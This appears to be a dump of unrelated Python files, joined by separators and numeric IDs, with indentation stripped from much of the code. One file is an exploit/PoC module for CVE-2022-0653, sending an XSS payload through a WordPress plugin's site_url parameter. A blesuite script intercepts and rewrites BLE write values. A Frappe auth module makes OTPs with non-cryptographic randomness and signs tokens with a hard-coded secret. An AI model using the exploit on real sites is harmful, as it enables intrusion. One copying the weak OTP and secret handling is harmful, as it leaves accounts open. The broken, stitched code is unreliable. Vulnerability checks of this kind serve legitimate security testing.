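        sklearn.linear_model.LogisticRegression,
        attr_dict={"fit_compute": fit_compute},
        class_name="LogisticRegression",
    )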
|
457016
|
import webview
import pytest
from .util import run_test
def test_bg_color():
window = webview.create_window('Background color test', 'https://www.example.org', background_color='#0000FF')
run_test(webview, window)
def test_invalid_bg_color():
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#dsg0000FF')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='FF00FF')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#ac')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#EFEFEH')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#0000000')
|
457042
|
import hoki.age_utils as au
import hoki.load as load
import pkg_resources
import numpy as np
import pandas as pd
import pytest
from hoki.utils.exceptions import HokiFatalError, HokiUserWarning, HokiFormatError
# Loading Data
data_path = pkg_resources.resource_filename('hoki', 'data')
hr_file = data_path + '/hrs-sin-imf_chab100.zem4.dat'
cmd_file = data_path + '/cmd_bv_z002_bin_imf135_300'
myhrd = load.model_output(hr_file, hr_type='TL')
mycmd = load.unpickle(cmd_file)
# Creating Test Inputs
fake_hrd_input = pd.DataFrame.from_dict({'name': ['star1', 'star2', 'star3'],
'logT': np.array([4.58, 4.48, 4.14]),
'logL': np.array([4.83, 5.07, 5.40])})
bad_hrd_input = pd.DataFrame.from_dict({'logT': np.array(['bla']),
'logL': np.array([4.83])})
no_name_input = pd.DataFrame.from_dict({'logT': np.array([4.58, 4.48, 4.14]),
'logL': np.array([4.83, 5.07, 5.40])})
bad_hrd_input2 = pd.DataFrame.from_dict({'logT': np.array([4.58, 'bla']),
'logL': np.array([4.83, 2.0])})
fake_cmd_input = pd.DataFrame.from_dict({'name': ['star1', 'star2', 'STAR3'],
'col': np.array([-0.3, 0.5, -0.25]),
'mag': np.array([-5, -10, -1])})
bad_cmd_input = pd.DataFrame.from_dict({'col': np.array(['bla']),
'mag': np.array([-5])})
# Testing Suite
class TestAgeWizard(object):
def test_init_basic(self):
assert au.AgeWizard(obs_df=fake_hrd_input, model=hr_file), "Loading HRD file path failed"
assert au.AgeWizard(obs_df=fake_hrd_input, model=myhrd), "Loading with hoki.hrdiagrams.HRDiagram failed"
        assert au.AgeWizard(obs_df=fake_cmd_input, model=mycmd), 'Loading with hoki.cmd.CMD failed'
        assert au.AgeWizard(obs_df=fake_cmd_input, model=cmd_file), 'Loading CMD from file failed'
def test_bad_init(self):
with pytest.raises(HokiFatalError):
__, __ = au.AgeWizard(obs_df=fake_cmd_input, model='sdfghj'), 'HokiFatalError should be raised'
with pytest.raises(HokiFormatError):
__, __ = au.AgeWizard(obs_df='edrftgyhu', model=cmd_file), 'HokiFormatError should be raised'
def test_combine_pdfs_not_you(self):
wiz = au.AgeWizard(fake_hrd_input, myhrd)
wiz.calculate_sample_pdf(not_you=['star1'])
cpdf = wiz.sample_pdf.pdf
assert np.sum(np.isclose([cpdf[0], cpdf[9]], [0.0, 0.7231526323765232])) == 2, "combined pdf is not right"
def test_most_likely_age(self):
wiz = au.AgeWizard(obs_df=fake_hrd_input, model=hr_file)
assert np.isclose(wiz.most_likely_age[0], 6.9), "Most likely age wrong"
def test_most_likely_ages(self):
wiz = au.AgeWizard(obs_df=fake_hrd_input, model=hr_file)
a = wiz.most_likely_ages
assert np.sum(np.isclose([a[0], a[1], a[2]], [6.9, 6.9, 6.9])) == 3, "Most likely ages not right"
def test_combine_pdfs(self):
wiz = au.AgeWizard(fake_hrd_input, myhrd)
wiz.calculate_sample_pdf()
assert np.isclose(wiz.sample_pdf.pdf[9],0.551756734145878), "Something is wrong with the combined_Age PDF"
def test_calculate_p_given_age_range(self):
wiz = au.AgeWizard(fake_hrd_input, myhrd)
probas = wiz.calculate_p_given_age_range([6.7, 6.9])
assert np.sum(np.isclose([probas[0], probas[1], probas[2]],
[0.515233714952414, 0.7920611550946726, 0.6542441096583737])) == 3, \
"probability given age range is messed up"
class TestFindCoordinates(object):
def test_hrd_input(self):
T_coord, L_coord = au.find_coordinates(obs_df=fake_hrd_input, model=myhrd)
assert np.sum(
np.isclose([T_coord[0], T_coord[1], T_coord[2]], [45, 44, 40])) == 3, "Temperature coordinates wrong"
assert np.sum(
np.isclose([L_coord[0], L_coord[1], L_coord[2]], [77, 80, 83])) == 3, "Luminosity coordinates wrong"
def test_cmd_input(self):
col_coord, mag_range = au.find_coordinates(obs_df=fake_cmd_input, model=mycmd)
assert np.sum(
np.isclose([col_coord[0], col_coord[1], col_coord[2]], [27, 35, 27])) == 3, "color coordinates wrong"
assert np.sum(
np.isclose([mag_range[0], mag_range[1], mag_range[2]], [90, 40, 130])) == 3, "magnitude coordinates wrong"
class TestFindCMDCoordinates(object):
def test_fake_input(self):
col_coord, mag_range = au._find_cmd_coordinates(obs_df=fake_cmd_input, mycmd=mycmd)
assert np.sum(
np.isclose([col_coord[0], col_coord[1], col_coord[2]], [27, 35, 27])) == 3, "color coordinates wrong"
assert np.sum(
np.isclose([mag_range[0], mag_range[1], mag_range[2]], [90, 40, 130])) == 3, "magnitude coordinates wrong"
def test_bad_input(self):
with pytest.raises(HokiFormatError):
col_coord, mag_range = au._find_cmd_coordinates(obs_df=bad_hrd_input, mycmd=mycmd)
def test_bad_input_2(self):
col_coord, mag_range = au._find_cmd_coordinates(obs_df=bad_cmd_input, mycmd=mycmd)
#assert np.siz(col_coord[0]), "This should be a nan"
assert np.isclose(mag_range[0], 90), "This L coordinate is wrong - test_bad_input."
class TestFindHRDCoordinates(object):
def test_fake_input(self):
T_coord, L_coord = au._find_hrd_coordinates(obs_df=fake_hrd_input, myhrd=myhrd)
assert np.sum(
np.isclose([T_coord[0], T_coord[1], T_coord[2]], [45, 44, 40])) == 3, "Temperature coordinates wrong"
assert np.sum(
np.isclose([L_coord[0], L_coord[1], L_coord[2]], [77, 80, 83])) == 3, "Luminosity coordinates wrong"
def test_bad_input(self):
with pytest.raises(HokiFormatError):
            __, __ = au._find_hrd_coordinates(obs_df=bad_cmd_input, myhrd=myhrd)
    def test_bad_input_2(self):
T_coord, L_coord = au._find_hrd_coordinates(obs_df=bad_hrd_input, myhrd=myhrd)
#assert np.isnan(T_coord[0]), "This should be a nan"
assert np.isclose(L_coord[0], 77), "This L coordinate is wrong - test_bad_input."
class TestNormalise1D(object):
def test_it_runs(self):
au.normalise_1d(np.array([0, 1, 4, 5, 0, 1, 7, 8]), crop_the_future=False)
def test_basic(self):
norm = au.normalise_1d(np.array([0, 0, 1, 0, 0, 0, 0]), crop_the_future=False)
assert norm[2] == 1, 'Normalisation done wrong'
assert sum(norm) == 1, "Normalisaton done wrong"
class TestCalculatePDFs(object):
def test_fake_input(self):
pdf_df = au.calculate_individual_pdfs(fake_hrd_input, myhrd)
assert 'star1' in pdf_df.columns, "Column name issue"
assert int(sum(pdf_df.star1)) == 1, "PDF not calculated correctly"
def test_input_without_name(self):
pdf_df = au.calculate_individual_pdfs(no_name_input, myhrd)
assert 's1' in pdf_df.columns, "Column names not created right"
def test_bad_input(self):
pdf_df = au.calculate_individual_pdfs(bad_hrd_input2, myhrd)
        assert not np.isnan(sum(pdf_df.s0)), "something went wrong"
        #assert np.isnan(sum(distributions_df.s1)), "something went wrong"
class TestCalculateSamplePDF(object):
def test_basic(self):
distributions = au.calculate_distributions(fake_hrd_input, myhrd)
combined = au.calculate_sample_pdf(distributions)
assert np.isclose(combined.pdf[9], 0.2715379752638662), "combined PDF not right"
def test_drop_bad(self):
distributions = au.calculate_distributions(fake_hrd_input, myhrd)
combined = au.calculate_sample_pdf(distributions, not_you=[3])
assert np.isclose(combined.pdf[9], 0.2715379752638662), "combined PDF not right"
def test_drop_good(self):
distributions = au.calculate_distributions(fake_hrd_input, myhrd)
combined = au.calculate_sample_pdf(distributions, not_you=['star1'])
assert np.isclose(combined.pdf[9], 0.774602971512809), "combined PDF not right"
|
457092
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Wordpress Profile Builder Plugin Cross-Site Scripting''',
"description": '''The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.''',
"severity": "medium",
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653",
"https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "CVE-2022-0653",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2022", "wordpress", "xss", "wp-plugin"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = '/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404'
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and '<a href="javascript:alert(document.domain);">here</a>' in resp.text and "text/html" in str(resp.headers):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
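# Example invocation sketch ("http://target.example" is a placeholder host, not a
# real target):
if __name__ == "__main__":
    result = poc("http://target.example")
    print(result.get("success"), result.get("payload", ""))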
|
457099
|
from blesuite.connection_manager import BLEConnectionManager
from blesuite.event_handler import ATTEventHook
from blesuite.entities.gatt_device import BLEDevice
from blesuite.entities.permissions import Permissions
import blesuite.utils.att_utils as att_utils
from scapy.layers.bluetooth import ATT_Read_Request, ATT_Read_Response, ATT_Error_Response
import gevent
import logging
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger(__name__)
adapter = 0
role = 'peripheral'
class MyCustomATTEventHandler(ATTEventHook):
# override
def att_write_hook(self, gatt_handle, data):
write_value_to_attribute = True
log.debug("ATT write hook triggered. Write value to attribute: %s value: %s" % (hex(gatt_handle), data))
print "Received value:", data
# replace data peer is attempting to write with string below
data = "Intercepted write value"
print "New write value is:", data
return (write_value_to_attribute, gatt_handle, data)
# Only enable one of these hooks at a time, otherwise the functionality will clash and prevent you from
# seeing the effects of both.
'''
def att_response_hook(self, received_packet, our_response_packet):
send_packet = True
log.debug("ATT response hook triggered. Received packet: %s Send packet: %s packet: %s" % (received_packet, send_packet, our_response_packet))
# If we receive an ATT Write Request and that results in some error, instead of sending the error packet,
# send a valid ATT Write Response to trick the peer device.
if ATT_Read_Request in received_packet and ATT_Error_Response in our_response_packet:
our_response_packet = ATT_Read_Response("Intercepted!")
return (send_packet, our_response_packet)
'''
# initialize event handler
event_handler = MyCustomATTEventHandler()
with BLEConnectionManager(adapter, role, att_operation_event_hook=event_handler) as connection_manager:
# Generate BLEDevice
ble_device = BLEDevice()
# Add Services and Characteristics to BLEDevice
service1 = ble_device.add_service(0x01, 0x06, "2124")
characteristic1 = service1.add_characteristic(0x03, 0x02, "2124",
Permissions.READ | Permissions.WRITE,
"testValue1",
characteristic_value_attribute_read_permission=att_utils.ATT_SECURITY_MODE_NO_ACCESS,
characteristic_value_attribute_write_permission=att_utils.ATT_SECURITY_MODE_OPEN
)
characteristic1.add_user_description_descriptor(0x04,
"Characteristic 1")
# Generate GATT server on host using BLEDevice information.
# 2nd param (True) tells the GATT import process to use attribute handles specified in the BLEDevice rather
# than sequentially assigning them as attributes are added to the server
connection_manager.initialize_gatt_server_from_ble_device(ble_device, True)
# Retrieve GATT server
gatt_server = connection_manager.get_gatt_server()
# Print GATT server for demonstration purposes
gatt_server.debug_print_db()
# alternate method: set event handler
connection_manager.set_att_operation_hook(event_handler)
# begin advertising
connection_manager.start_advertising()
# continually run server without blocking packet processing
while True:
gevent.sleep(1)
|
457104
|
import numpy as np
import matplotlib.pyplot as plt
import afterglowpy as grb
Z = {'jetType': grb.jet.TopHat, # Top-Hat jet
'specType': 0, # Basic Synchrotron Emission Spectrum
'thetaObs': 0.05, # Viewing angle in radians
'E0': 1.0e53, # Isotropic-equivalent energy in erg
'thetaCore': 0.1, # Half-opening angle in radians
'n0': 1.0, # circumburst density in cm^{-3}
'p': 2.2, # electron energy distribution index
'epsilon_e': 0.1, # epsilon_e
'epsilon_B': 0.01, # epsilon_B
'xi_N': 1.0, # Fraction of electrons accelerated
'd_L': 1.0e28, # Luminosity distance in cm
'z': 0.55} # redshift
nua = 1.0e0 # Low Frequencies in Hz
nub = 1.0e20 # High Frequencies in Hz
t = 1.0 * grb.day2sec # spectrum at 1 day
nu = np.geomspace(nua, nub, num=100)
print("Calculating")
Fnu = grb.fluxDensity(t, nu, **Z)
print("Writing spec.txt")
with open("spec.txt", 'w') as f:
f.write("# t " + str(t) + ' (s)\n')
f.write("# nu(Hz) Fnu(mJy)\n")
for i in range(len(nu)):
f.write("{0:.6e} {1:.6e}\n".format(nu[i], Fnu[i]))
print("Plotting")
fig, ax = plt.subplots(1, 1)
ax.plot(nu, Fnu)
ax.set_xscale('log')
ax.set_yscale('log')
ax.set_xlabel(r'$\nu$ (Hz)')
ax.set_ylabel(r'$F_\nu$[1 day] (mJy)')
fig.tight_layout()
print("Saving figure spec.png")
fig.savefig("spec.png")
plt.close(fig)
|
457113
|
import FWCore.ParameterSet.Config as cms
# Set the HLT paths
import HLTrigger.HLTfilters.hltHighLevel_cfi
ALCARECOSiStripCalMinBiasAAGHLT = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone(
andOr = True, ## choose logical OR between Triggerbits
## HLTPaths = [
## #Minimum Bias
## "HLT_MinBias*"
## ],
# We want to change this key to SiStripCalMinBiasAAGHI --> update triggerbits first
eventSetupPathsKey = 'SiStripCalMinBiasAAGHI',
    throw = False # do not throw if the triggers stated above are not available
)
# Select only events where tracker had HV on (according to DCS bit information)
# AND respective partition is in the run (according to FED information)
import CalibTracker.SiStripCommon.SiStripDCSFilter_cfi
DCSStatusForSiStripCalMinBiasAAG = CalibTracker.SiStripCommon.SiStripDCSFilter_cfi.siStripDCSFilter.clone()
# Select pp-like events based on the pixel cluster multiplicity
#import HLTrigger.special.hltPixelActivityFilter_cfi
#HLTPixelActivityFilterForSiStripCalMinBias = HLTrigger.special.hltPixelActivityFilter_cfi.hltPixelActivityFilter.clone()
#HLTPixelActivityFilterForSiStripCalMinBias.maxClusters = 500
#HLTPixelActivityFilterForSiStripCalMinBias.inputTag = 'siPixelClusters'
# Select only good tracks
import Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi
ALCARECOSiStripCalMinBiasAAG = Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone()
ALCARECOSiStripCalMinBiasAAG.filter = True ##do not store empty events
ALCARECOSiStripCalMinBiasAAG.src = 'hiGeneralTracks'
ALCARECOSiStripCalMinBiasAAG.applyBasicCuts = True
ALCARECOSiStripCalMinBiasAAG.ptMin = 0.8 ##GeV
ALCARECOSiStripCalMinBiasAAG.nHitMin = 6 ## at least 6 hits required
ALCARECOSiStripCalMinBiasAAG.chi2nMax = 10.
ALCARECOSiStripCalMinBiasAAG.GlobalSelector.applyIsolationtest = False
ALCARECOSiStripCalMinBiasAAG.GlobalSelector.applyGlobalMuonFilter = False
ALCARECOSiStripCalMinBiasAAG.GlobalSelector.applyJetCountFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyMassrangeFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyChargeFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyAcoplanarityFilter = False
ALCARECOSiStripCalMinBiasAAG.TwoBodyDecaySelector.applyMissingETFilter = False
# Sequence with the filter for the Pixel activity #
#seqALCARECOSiStripCalMinBias = cms.Sequence(ALCARECOSiStripCalMinBiasHLT*HLTPixelActivityFilterForSiStripCalMinBias*DCSStatusForSiStripCalMinBias*ALCARECOSiStripCalMinBias)
seqALCARECOSiStripCalMinBiasAAG = cms.Sequence(ALCARECOSiStripCalMinBiasAAGHLT *
DCSStatusForSiStripCalMinBiasAAG *
ALCARECOSiStripCalMinBiasAAG)
|
457128
|
from setuptools import setup, find_packages
setup(
name='mkdocs-pdf-export-plugin',
version='0.5.10',
description='An MkDocs plugin to export content pages as PDF files',
    long_description='The pdf-export plugin will export all markdown pages in your MkDocs repository as PDF files '
                     'using WeasyPrint. The exported documents support many advanced features missing in most other '
                     'PDF exports, such as a PDF Index and support for the CSS paged media module.',
keywords='mkdocs pdf export weasyprint',
url='https://github.com/zhaoterryy/mkdocs-pdf-export-plugin/',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
python_requires='>=3.5',
install_requires=[
'mkdocs>=0.17',
'weasyprint>=0.44',
'beautifulsoup4>=4.6.3'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
packages=find_packages(),
entry_points={
'mkdocs.plugins': [
'pdf-export = mkdocs_pdf_export_plugin.plugin:PdfExportPlugin'
]
}
)
|
457143
|
import random
from six import string_types
import frappe
import jwt
from frappe import _
from frappe.auth import LoginManager
from frappe.utils import cint, get_url, get_datetime
from frappe.utils.password import check_password, passlibctx, update_password
from renovation_core.utils import update_http_response
from .sms_setting import send_sms
@frappe.whitelist(allow_guest=True)
def generate_otp(medium="sms", medium_id=None, sms_hash=None, purpose="login", lang="en"):
"""
Generate and Send an OTP through the medium specified. we generate new pin on each call, ignoring previous pins
3 variables available to render in template:
- otp
- mobile_no (if sms)
- email (if email)
- user (the User object)
:param medium: 'email' or 'sms'
:param medium_id: The actual email/mobile_no
:param sms_hash: The hash that should be appended to OTP SMS
:param purpose: Specify an optional purpose (login, pwd_reset) to make a custom context
:param lang: Language of the OTP message (SMS or Email)
"""
if medium not in ("sms", "email"):
frappe.throw("medium can only be 'sms' or 'email'")
if not medium_id:
frappe.throw(f"medium_id is mandatory")
user = get_linked_user(id_type=medium, id=medium_id)
if user:
lang = frappe.db.get_value("User", user, "language")
frappe.local.lang = lang
# generate a pin
otp = frappe.safe_decode(str(get_otp()))
# saving the hashed pin, not the pin as is
hashed_pin = passlibctx.hash(otp)
expires_in_sec = (cint(frappe.db.get_value(
"System Settings", None, "verification_otp_validity")) or 15) * 60
frappe.cache().set_value(
get_otp_redis_key(
medium, medium_id,
purpose),
hashed_pin,
expires_in_sec=expires_in_sec
)
status = "success"
if medium == "sms":
sms_otp_template = frappe.db.get_value(
"System Settings", None, "sms_otp_template")
if not sms_otp_template:
frappe.throw("Please set SMS OTP Template in System Settings")
sms_otp_template = frappe.get_doc("SMS Template", sms_otp_template)
render_params = frappe._dict(
otp=otp,
mobile_no=medium_id,
user=frappe.get_doc("User", user) if user else frappe._dict()
)
msg = frappe.render_template(
sms_otp_template.template, render_params)
if sms_hash:
msg = msg + u"\n" + sms_hash
sms = send_sms([medium_id], msg, success_msg=False)
status = "fail"
# Since SMS Settings might remove or add '+' character, we will check against the last 5 digits
if sms and isinstance(sms, list) and len(sms) == 1 and (medium_id[-5:] in sms[0] if isinstance(sms[0], string_types) else medium_id[-5:] in sms[0].sent_to):
status = "success"
elif medium == "email":
email_otp_template = frappe.db.get_value(
"System Settings", None, "email_otp_template")
if not email_otp_template:
frappe.throw("Please set Email OTP Template in System Settings")
email_otp_template = frappe.get_doc("Email Template", email_otp_template)
render_params = frappe._dict(
otp=otp,
email=medium_id,
user=frappe.get_doc("User", user) if user else frappe._dict()
)
status = "fail"
try:
frappe.sendmail(
recipients=[medium_id],
delayed=False,
subject=frappe.render_template(
email_otp_template.subject, render_params),
message=frappe.render_template(
email_otp_template.response, render_params)
)
status = "success"
except frappe.OutgoingEmailError:
status = "fail"
return frappe._dict({"status": status, medium: medium_id})
def generate_otp_deprecated():
medium = frappe.local.form_dict.medium or "sms"
mobile = frappe.local.form_dict.mobile
email = frappe.local.form_dict.email
sms_hash = frappe.local.form_dict.hash
update_http_response(generate_otp(medium, mobile or email, sms_hash))
@frappe.whitelist(allow_guest=True)
def verify_otp(medium="sms", medium_id=None, otp=None, login_to_user=False, purpose="login"):
"""
Verify the OTP against the previously generated OTP.
:param medium: 'email' or 'sms'
:param medium_id: The actual email/mobile_no
:param otp: User input
:param login_to_user: Check this flag to login to the associated user
:param purpose: If purpose was specified while calling generate_otp, it is mandatory to use the same here
"""
if medium not in ("sms", "email"):
frappe.throw("medium can only be 'sms' or 'email'")
if not medium_id:
frappe.throw(f"medium_id is mandatory")
def http_response(out):
r = frappe._dict(status=out, medium=medium_id)
return r
user = None
if login_to_user:
user = get_linked_user(id_type=medium, id=medium_id)
if not user:
return http_response("no_linked_user")
redis_key = get_otp_redis_key(medium, medium_id, purpose)
hashed_otp = frappe.safe_decode(
frappe.cache().get_value(redis_key, expires=True))
if not hashed_otp:
return http_response("no_otp_for_mobile")
if not passlibctx.verify(otp, hashed_otp):
return http_response("invalid_otp")
if login_to_user == 1:
l = LoginManager()
l.login_as(user)
l.resume = False
l.run_trigger('on_session_creation')
return http_response("verified")
def verify_otp_deprecated():
medium = frappe.local.form_dict.medium or "sms"
mobile = frappe.local.form_dict.mobile
email = frappe.local.form_dict.email
pin = frappe.local.form_dict.pin
login = cint(frappe.local.form_dict.loginToUser or "0")
r = verify_otp(medium=medium, medium_id=mobile or email,
otp=pin, login_to_user=login)
# Response Compatibility
  if r.status == "no_otp_for_mobile":
r.status = "no_pin_for_mobile"
elif r.status == "invalid_otp":
r.status = "invalid_pin"
update_http_response(r)
def get_otp_redis_key(medium, medium_id, purpose):
return f"{purpose}_{medium}:{medium_id}"
def get_linked_user(id_type, id):
"""
Returns the user associated with the details
:param id_type: either 'mobile' or 'email'
:param id: the email/mobile
"""
if id_type not in ("mobile", "sms", "email"):
frappe.throw(f"Invalid id_type: {id_type}")
if id_type in ("mobile", "sms"):
id_type = "mobile_no"
return frappe.db.get_value("User", {id_type: id})
def get_otp(length=6):
return random.sample(range(int('1' + '0' * (length - 1)), int('9' * length)), 1)[0]
@frappe.whitelist(allow_guest=True)
def pin_login(user, pin, device=None):
"""
Login using the user's email and the quick login pin
:param user: The active user
:param pin: The quick login pin
:param device: Clear all sessions of device
"""
from frappe.sessions import clear_sessions
login = LoginManager()
if not frappe.cache().get_value(f'can_use_quick_login_pin', user=user, expires=True):
login.fail('Quick Login PIN time expired', user=user)
login.check_if_enabled(user)
if not check_password(user, pin, doctype='User', fieldname='quick_login_pin'):
login.fail('Incorrect password', user=user)
login.login_as(user)
login.resume = False
login.run_trigger('on_session_creation')
if device:
clear_sessions(user, True, device)
return frappe.session.user
@frappe.whitelist(allow_guest=True)
def get_token(user, pwd, expires_in=3600, expire_on=None, device=None):
"""
Get the JWT Token
:param user: The user in ctx
:param pwd: <PASSWORD>
:param expires_in: number of seconds till expiry
:param expire_on: yyyy-mm-dd HH:mm:ss to specify the expiry (deprecated)
:param device: The device in ctx
"""
if not frappe.db.exists("User", user):
    raise frappe.ValidationError(_("Invalid User"))
from frappe.sessions import clear_sessions
login = LoginManager()
login.check_if_enabled(user)
if not check_password(user, pwd):
login.fail('Incorrect password', user=user)
login.login_as(user)
login.resume = False
login.run_trigger('on_session_creation')
_expires_in = 3600
if cint(expires_in):
_expires_in = cint(expires_in)
elif expire_on:
_expires_in = (get_datetime(expire_on) - get_datetime()).total_seconds()
token = get_bearer_token(
user=user,
expires_in=_expires_in
)
frappe.local.response["token"] = token["access_token"]
frappe.local.response.update(token)
def get_oath_client():
client = frappe.db.get_value("OAuth Client", {})
if not client:
# Make one auto
client = frappe.get_doc(frappe._dict(
doctype="OAuth Client",
app_name="default",
scopes="all openid",
redirect_urls=get_url(),
default_redirect_uri=get_url(),
grant_type="Implicit",
response_type="Token"
))
client.insert(ignore_permissions=True)
else:
client = frappe.get_doc("OAuth Client", client)
return client
def get_bearer_token(user, expires_in=3600):
import hashlib
import jwt
import frappe.oauth
from oauthlib.oauth2.rfc6749.tokens import random_token_generator, OAuth2Token
client = get_oath_client()
token = frappe._dict({
'access_token': random_token_generator(None),
'expires_in': expires_in,
'token_type': 'Bearer',
'scopes': client.scopes,
'refresh_token': random_token_generator(None)
})
bearer_token = frappe.new_doc("OAuth Bearer Token")
bearer_token.client = client.name
bearer_token.scopes = token['scopes']
bearer_token.access_token = token['access_token']
bearer_token.refresh_token = token.get('refresh_token')
bearer_token.expires_in = token['expires_in'] or 3600
bearer_token.user = user
bearer_token.save(ignore_permissions=True)
frappe.db.commit()
# ID Token
id_token_header = {
"typ": "jwt",
"alg": "HS256"
}
id_token = {
"aud": "token_client",
"exp": int((frappe.db.get_value("OAuth Bearer Token", token.access_token, "expiration_time") - frappe.utils.datetime.datetime(1970, 1, 1)).total_seconds()),
"sub": frappe.db.get_value("User Social Login", {"parent": bearer_token.user, "provider": "frappe"}, "userid"),
"iss": "frappe_server_url",
"at_hash": frappe.oauth.calculate_at_hash(token.access_token, hashlib.sha256)
}
id_token_encoded = jwt.encode(
id_token, "client_secret", algorithm='HS256', headers=id_token_header)
id_token_encoded = frappe.safe_decode(id_token_encoded)
token.id_token = id_token_encoded
frappe.flags.jwt = id_token_encoded
return token
@frappe.whitelist()
def get_jwt_token():
"""
Get jwt token for the active user
"""
return get_bearer_token(
user=frappe.session.user, expires_in=86400
)["access_token"]
@frappe.whitelist()
def change_password(old_password, new_password):
"""
Update the password when old password is given
:param old_password: The old password of the User
:param new_password: The new password to set for the user
"""
from frappe.core.doctype.user.user import test_password_strength, handle_password_test_fail
  check_password(user=frappe.session.user, pwd=old_password)
user = frappe.get_doc("User", frappe.session.user)
user_data = (user.first_name, user.middle_name,
user.last_name, user.email, user.birth_date)
result = test_password_strength(new_password, '', None, user_data)
feedback = result.get("feedback", None)
if feedback and not feedback.get('password_policy_validation_passed', False):
handle_password_test_fail(result)
update_password(user.name, new_password)
return True
|
457161
|
import idc
import ida_enum
from bip.py3compat.py3compat import *
from .bipelt import BipRefElt
class BipEnum(object):
"""
Class for representing and manipulating an enum in IDA.
    Class methods :meth:`~BipEnum.get` and :meth:`~BipEnum.create` allow
    to easily create and retrieve a :class:`BipEnum` object.
    Enums in IDA do not support xrefs; however, the enum members do.
.. todo:: allow to set an instruction operand as an enum
"""
########################## BASE ##########################
def __init__(self, eid):
"""
        Constructor for a :class:`BipEnum` object. There are few reasons
        to use this constructor directly; see the functions:
:meth:`~BipEnum.get` or :meth:`~BipEnum.create`
:param int eid: The enum id (``enum_t``) representing this enum.
"""
self._eid = eid
def __eq__(self, other):
"""
Compare two BipEnum.
"""
if isinstance(other, BipEnum):
return self._eid == other._eid
elif isinstance(other, (int, long)):
return self._eid == other
else:
return NotImplemented
def __ne__(self, other):
res = self.__eq__(other)
if res == NotImplemented:
return res
else:
return not res
@classmethod
def _is_this_elt(cls, idelt):
"""
        Return true if ``idelt`` corresponds to an enum_t.
"""
return ida_enum.get_enum_name(idelt) is not None
@property
def name(self):
"""
        Property for getting the name of this enum. A setter exists for
this property.
:return str: The name of this enum.
"""
return ida_enum.get_enum_name(self._eid)
@name.setter
def name(self, value):
"""
Setter for setting the name of this enum.
:param str value: The new name to set for the enum.
:raise ValueError: If setting the name failed.
"""
if not ida_enum.set_enum_name(self._eid, value):
raise ValueError("Impossible to set new name {} for the enum".format(value))
@property
def width(self):
"""
Property for getting the width in bytes of an enum. The width of
an enum can be: 0 (unspecified),1,2,4,8,16,32,64.
:return int: The width of the enum.
"""
return ida_enum.get_enum_width(self._eid)
@width.setter
def width(self, value):
"""
Setter for the width of an enum. The width in bytes of an enum
can be: 0 (unspecified),1,2,4,8,16,32,64.
:param int value: The width of the enum.
:raise ValueError: If the value is not supported.
:raise RuntimeError: If it was unable to change the width of an
enum.
"""
if value not in (0,1,2,4,8,16,32,64):
            raise ValueError("Unsupported width {} for enum".format(value))
if not ida_enum.set_enum_width(self._eid, value):
raise RuntimeError("Unable to change width of the enum")
@property
def is_bitfield(self):
"""
Property for getting or setting if an enum is a bitfield.
:return bool: True if this enum is a bitfield, false otherwise.
"""
return ida_enum.is_bf(self._eid)
@is_bitfield.setter
def is_bitfield(self, value):
"""
        Setter for marking an enum as being a bitfield.
        :param bool value: True to mark this enum as a bitfield,
            False to mark it as not a bitfield.
:raise RuntimeError: If unable to change the enum.
"""
if not ida_enum.set_enum_bf(self._eid, value):
raise RuntimeError("Unable to change the enum bitfield characteristic")
def __str__(self):
return "Enum: {}".format(self.name)
@property
def comment(self):
"""
        Property which returns the comment associated with an enum.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_cmt(self._eid, False)
@comment.setter
def comment(self, value):
"""
Property setter for changing the enum comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_cmt(self._eid, value, False)
@property
def rcomment(self):
"""
        Property which returns the repeatable comment associated with an
enum.
:return: The comment as a string or None if no comment is
associated with it.
"""
return ida_enum.get_enum_cmt(self._eid, True)
@rcomment.setter
def rcomment(self, value):
"""
Property setter for changing the enum repeatable comment.
:param str value: The new comment to set.
"""
ida_enum.set_enum_cmt(self._eid, value, True)
############################### MEMBERS ###############################
@property
def nb_members(self):
"""
        Property which returns the number of members present in this enum.
"""
